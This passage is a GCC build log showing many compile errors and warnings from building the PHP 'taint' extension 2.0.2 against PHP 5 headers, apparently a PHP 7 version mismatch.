static zval *php_taint_get_zval_ptr_ptr_var(zend_execute_data *execute_data, uint32_t var, zend_free_op *should_free) /* {{{ */ {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_get_zval_ptr_ptr':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:592:3: warning: return makes pointer from integer without a cast [enabled by default]
return php_taint_get_zval_ptr_cv(execute_data, op.var, type, 1);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:595:3: warning: return makes pointer from integer without a cast [enabled by default]
return php_taint_get_zval_ptr_ptr_var(execute_data, op.var, should_free);
^
In file included from /usr/include/php5/Zend/zend_modules.h:26:0,
from /usr/include/php5/Zend/zend_API.h:26,
from /usr/include/php5/main/php.h:39,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_compile.h:402:33: error: request for member 'This' in something not a structure or union
#define EX(element) execute_data.element
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:598:11: note: in expansion of macro 'EX'
return &EX(This);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_error':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:613:2: warning: format not a string literal and no format arguments [-Wformat-security]
zend_error(TAINT_G(error_level), msg);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_init_dynamic_fcall_handler':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:663:4: error: too few arguments to function 'zend_hash_index_find'
zval *cname = zend_hash_index_find(Z_ARRVAL_P(op2), 0);
^
In file included from /usr/include/php5/Zend/zend.h:286:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_hash.h:166:14: note: declared here
ZEND_API int zend_hash_index_find(const HashTable *ht, ulong h, void **pData);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:664:4: error: too few arguments to function 'zend_hash_index_find'
zval *mname = zend_hash_index_find(Z_ARRVAL_P(op2), 0);
^
In file included from /usr/include/php5/Zend/zend.h:286:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_hash.h:166:14: note: declared here
ZEND_API int zend_hash_index_find(const HashTable *ht, ulong h, void **pData);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_rope_handler':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:710:2: error: unknown type name 'zend_string'
zend_string **rope;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:715:10: error: 'zend_string' undeclared (first use in this function)
rope = (zend_string **)EX_VAR(opline->op1.var);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:715:24: error: expected expression before ')' token
rope = (zend_string **)EX_VAR(opline->op1.var);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:717:9: warning: assignment makes pointer from integer without a cast [enabled by default]
result = EX_VAR(opline->result.var);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:719:31: warning: assignment makes pointer from integer without a cast [enabled by default]
rope[opline->extended_value] = zval_get_string(op2);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:732:3: warning: passing argument 2 of 'memcpy' makes pointer from integer without a cast [enabled by default]
memcpy(target, ZSTR_VAL(rope[i]), ZSTR_LEN(rope[i]));
^
In file included from /usr/include/features.h:374:0,
from /usr/include/stdlib.h:24,
from /usr/include/php5/main/php_config.h:2418,
from /usr/include/php5/main/php.h:33,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/x86_64-linux-gnu/bits/string3.h:48:1: note: expected 'const void * restrict' but argument is of type 'int'
__NTH (memcpy (void *__restrict __dest, const void *__restrict __src,
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:739:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(result));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_concat_handler':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:756:9: warning: assignment makes pointer from integer without a cast [enabled by default]
result = EX_VAR(opline->result.var);
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:766:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(result));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_binary_assign_op_helper':
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:807:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(var_ptr));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_binary_assign_op_obj_helper':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:834:55: warning: comparison between pointer and integer [enabled by default]
if (opline->op1_type == IS_UNUSED && Z_OBJ_P(object) == NULL) {
^
In file included from /usr/include/php5/Zend/zend.h:840:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_operators.h:486:33: error: invalid type argument of unary '*' (have 'int')
#define Z_TYPE_P(zval_p) Z_TYPE(*zval_p)
^
/usr/include/php5/Zend/zend_operators.h:485:24: note: in definition of macro 'Z_TYPE'
#define Z_TYPE(zval) (zval).type
^
/usr/include/php5/Zend/zend_API.h:559:3: note: in expansion of macro 'Z_TYPE_P'
Z_TYPE_P(z) = IS_NULL;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:848:6: note: in expansion of macro 'ZVAL_NULL'
ZVAL_NULL(EX_VAR(opline->result.var));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:857:17: warning: assignment from incompatible pointer type [enabled by default]
&& (var_ptr = Z_OBJ_HT_P(object)->get_property_ptr_ptr(object, property, BP_VAR_RW, NULL)) != NULL) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:873:5: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(var_ptr));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:876:4: warning: passing argument 6 of 'php_taint_assign_op_overloaded_property' makes pointer from integer without a cast [enabled by default]
php_taint_assign_op_overloaded_property(object, property, NULL, value, binary_op, EX_VAR(opline->result.var));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:407:13: note: expected 'struct zval *' but argument is of type 'int'
static void php_taint_assign_op_overloaded_property(zval *object, zval *property, void **cache_slot, zval *value, binary_op_type binary_op, zval *result) /* {{{ */ {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_binary_assign_op_dim_helper':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:905:58: warning: comparison between pointer and integer [enabled by default]
if (opline->op1_type == IS_UNUSED && Z_OBJ_P(container) == NULL) {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:917:4: warning: passing argument 4 of 'php_taint_binary_assign_op_obj_dim' makes pointer from integer without a cast [enabled by default]
php_taint_binary_assign_op_obj_dim(container, dim, value, EX_VAR(opline->result.var), binary_op);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:457:13: note: expected 'struct zval *' but argument is of type 'int'
static void php_taint_binary_assign_op_obj_dim(zval *object, zval *property, zval *value, zval *retval, binary_op_type binary_op) /* {{{ */ {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:928:11: warning: assignment makes pointer from integer without a cast [enabled by default]
var_ptr = Z_INDIRECT(rv);
^
In file included from /usr/include/php5/Zend/zend.h:840:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_operators.h:486:33: error: invalid type argument of unary '*' (have 'int')
#define Z_TYPE_P(zval_p) Z_TYPE(*zval_p)
^
/usr/include/php5/Zend/zend_operators.h:485:24: note: in definition of macro 'Z_TYPE'
#define Z_TYPE(zval) (zval).type
^
/usr/include/php5/Zend/zend_API.h:559:3: note: in expansion of macro 'Z_TYPE_P'
Z_TYPE_P(z) = IS_NULL;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:947:5: note: in expansion of macro 'ZVAL_NULL'
ZVAL_NULL(EX_VAR(opline->result.var));
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:966:5: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(var_ptr));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_fcall_check':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1007:24: warning: initialization makes pointer from integer without a cast [enabled by default]
const char *fname = ZSTR_VAL(fbc->common.function_name);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1010:15: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *p = ZEND_CALL_ARG(ex, 1);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1018:15: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *p = ZEND_CALL_ARG(ex, 1);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1026:15: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *p = ZEND_CALL_ARG(ex, 1);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1036:15: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *p = ZEND_CALL_ARG(ex, 1);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1044:15: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *p = ZEND_CALL_ARG(ex, 1);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1053:6: error: unknown type name 'uint32_t'
uint32_t i;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1055:17: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *p = ZEND_CALL_ARG(ex, i + 1);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1067:6: error: unknown type name 'zend_string'
zend_string *key;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1068:6: error: unknown type name 'zend_long'
zend_long idx;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1069:22: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *val, *p = ZEND_CALL_ARG(ex, 1);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1074:62: error: expected ';' before '{' token
ZEND_HASH_FOREACH_KEY_VAL(Z_ARRVAL_P(p), idx, key, val) {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1093:9: warning: assignment makes pointer from integer without a cast [enabled by default]
fp = ZEND_CALL_ARG(ex, 1);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1094:10: warning: assignment makes pointer from integer without a cast [enabled by default]
str = ZEND_CALL_ARG(ex, 2);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1111:20: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *header = ZEND_CALL_ARG(ex, 1);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1120:17: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *str = ZEND_CALL_ARG(ex, 1);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1132:19: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *query = ZEND_CALL_ARG(ex, arg_count);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1141:18: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *sql = ZEND_CALL_ARG(ex, 2);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1151:23: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *callback = ZEND_CALL_ARG(ex, 2);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1157:7: error: too few arguments to function 'zend_hash_index_find'
zval *cname = zend_hash_index_find(Z_ARRVAL_P(callback), 0);
^
In file included from /usr/include/php5/Zend/zend.h:286:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_hash.h:166:14: note: declared here
ZEND_API int zend_hash_index_find(const HashTable *ht, ulong h, void **pData);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1158:7: error: too few arguments to function 'zend_hash_index_find'
zval *mname = zend_hash_index_find(Z_ARRVAL_P(callback), 0);
^
In file included from /usr/include/php5/Zend/zend.h:286:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_hash.h:166:14: note: declared here
ZEND_API int zend_hash_index_find(const HashTable *ht, ulong h, void **pData);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1176:17: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *cmd = ZEND_CALL_ARG(ex, arg_count);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1187:29: warning: initialization makes pointer from integer without a cast [enabled by default]
const char *class_name = ZSTR_VAL(fbc->common.scope->name);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1189:24: warning: initialization makes pointer from integer without a cast [enabled by default]
const char *fname = ZSTR_VAL(fbc->common.function_name);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1194:18: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *sql = ZEND_CALL_ARG(ex, arg_count);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1206:18: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *sql = ZEND_CALL_ARG(ex, arg_count);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1218:18: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *sql = ZEND_CALL_ARG(ex, arg_count);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1230:18: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *sql = ZEND_CALL_ARG(ex, arg_count);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_fcall_handler':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1245:28: warning: initialization from incompatible pointer type [enabled by default]
zend_execute_data *call = execute_data->call;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1246:27: error: 'zend_execute_data' has no member named 'func'
zend_function *fbc = call->func;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_register_handlers':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1258:31: error: 'ZEND_INIT_USER_CALL' undeclared (first use in this function)
zend_set_user_opcode_handler(ZEND_INIT_USER_CALL, php_taint_init_dynamic_fcall_handler);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1259:31: error: 'ZEND_INIT_DYNAMIC_CALL' undeclared (first use in this function)
zend_set_user_opcode_handler(ZEND_INIT_DYNAMIC_CALL, php_taint_init_dynamic_fcall_handler);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1262:31: error: 'ZEND_FAST_CONCAT' undeclared (first use in this function)
zend_set_user_opcode_handler(ZEND_FAST_CONCAT, php_taint_concat_handler);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1264:31: error: 'ZEND_ROPE_END' undeclared (first use in this function)
zend_set_user_opcode_handler(ZEND_ROPE_END, php_taint_rope_handler);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1266:31: error: 'ZEND_DO_ICALL' undeclared (first use in this function)
zend_set_user_opcode_handler(ZEND_DO_ICALL, php_taint_fcall_handler);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_override_func':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1272:12: warning: assignment makes pointer from integer without a cast [enabled by default]
if ((func = zend_hash_str_find_ptr(CG(function_table), name, strlen(name))) != NULL) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_strval':
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1345:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_sprintf':
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1370:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_vsprintf':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1379:2: error: unknown type name 'zend_string'
zend_string *format;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1393:48: error: expected ';' before '{' token
ZEND_HASH_FOREACH_VAL(Z_ARRVAL_P(args), val) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1405:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_explode':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1413:2: error: unknown type name 'zend_string'
zend_string *str, *delim;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1414:2: error: unknown type name 'zend_long'
zend_long limit = ZEND_LONG_MAX;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1414:20: error: 'ZEND_LONG_MAX' undeclared (first use in this function)
zend_long limit = ZEND_LONG_MAX;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_implode':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1452:50: error: expected ';' before '{' token
ZEND_HASH_FOREACH_VAL(Z_ARRVAL_P(target), val) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1464:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_trim':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1473:2: error: unknown type name 'zend_string'
zend_string *str, *what;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1487:26: warning: comparison between pointer and integer [enabled by default]
Z_STR_P(return_value) != str && Z_STRLEN_P(return_value)) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1488:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_rtrim':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1497:2: error: unknown type name 'zend_string'
zend_string *str, *what;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1511:26: warning: comparison between pointer and integer [enabled by default]
Z_STR_P(return_value) != str && Z_STRLEN_P(return_value)) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1512:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_ltrim':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1521:2: error: unknown type name 'zend_string'
zend_string *str, *what;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1535:26: warning: comparison between pointer and integer [enabled by default]
Z_STR_P(return_value) != str && Z_STRLEN_P(return_value)) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1536:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_str_replace':
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1561:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_str_pad':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1570:2: error: unknown type name 'zend_string'
zend_string *input;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1571:2: error: unknown type name 'zend_long'
zend_long pad_length;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1572:2: error: unknown type name 'zend_string'
zend_string *pad_str = NULL;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1573:2: error: unknown type name 'zend_long'
zend_long pad_type_val = 1;
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1589:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_strstr':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1599:2: error: unknown type name 'zend_string'
zend_string *haystack;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1614:26: warning: comparison between pointer and integer [enabled by default]
Z_STR_P(return_value) != haystack && Z_STRLEN_P(return_value)) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1615:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_substr':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1624:2: error: unknown type name 'zend_string'
zend_string *str;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1625:2: error: unknown type name 'zend_long'
zend_long l = 0, f;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1639:26: warning: comparison between pointer and integer [enabled by default]
Z_STR_P(return_value) != str && Z_STRLEN_P(return_value)) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1640:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_strtolower':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1649:2: error: unknown type name 'zend_string'
zend_string *str;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1663:26: warning: comparison between pointer and integer [enabled by default]
Z_STR_P(return_value) != str && Z_STRLEN_P(return_value)) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1664:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_strtoupper':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1673:2: error: unknown type name 'zend_string'
zend_string *str;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1687:26: warning: comparison between pointer and integer [enabled by default]
Z_STR_P(return_value) != str && Z_STRLEN_P(return_value)) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1688:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_dirname':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1696:2: error: unknown type name 'zend_string'
zend_string *str;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1697:2: error: unknown type name 'zend_long'
zend_long levels = 1;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1711:29: warning: comparison between pointer and integer [enabled by default]
&& Z_STR_P(return_value) != str && Z_STRLEN_P(return_value)) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1712:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_basename':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1720:2: error: unknown type name 'zend_string'
zend_string *string, *suffix = NULL;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1734:29: warning: comparison between pointer and integer [enabled by default]
&& Z_STR_P(return_value) != string && Z_STRLEN_P(return_value)) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
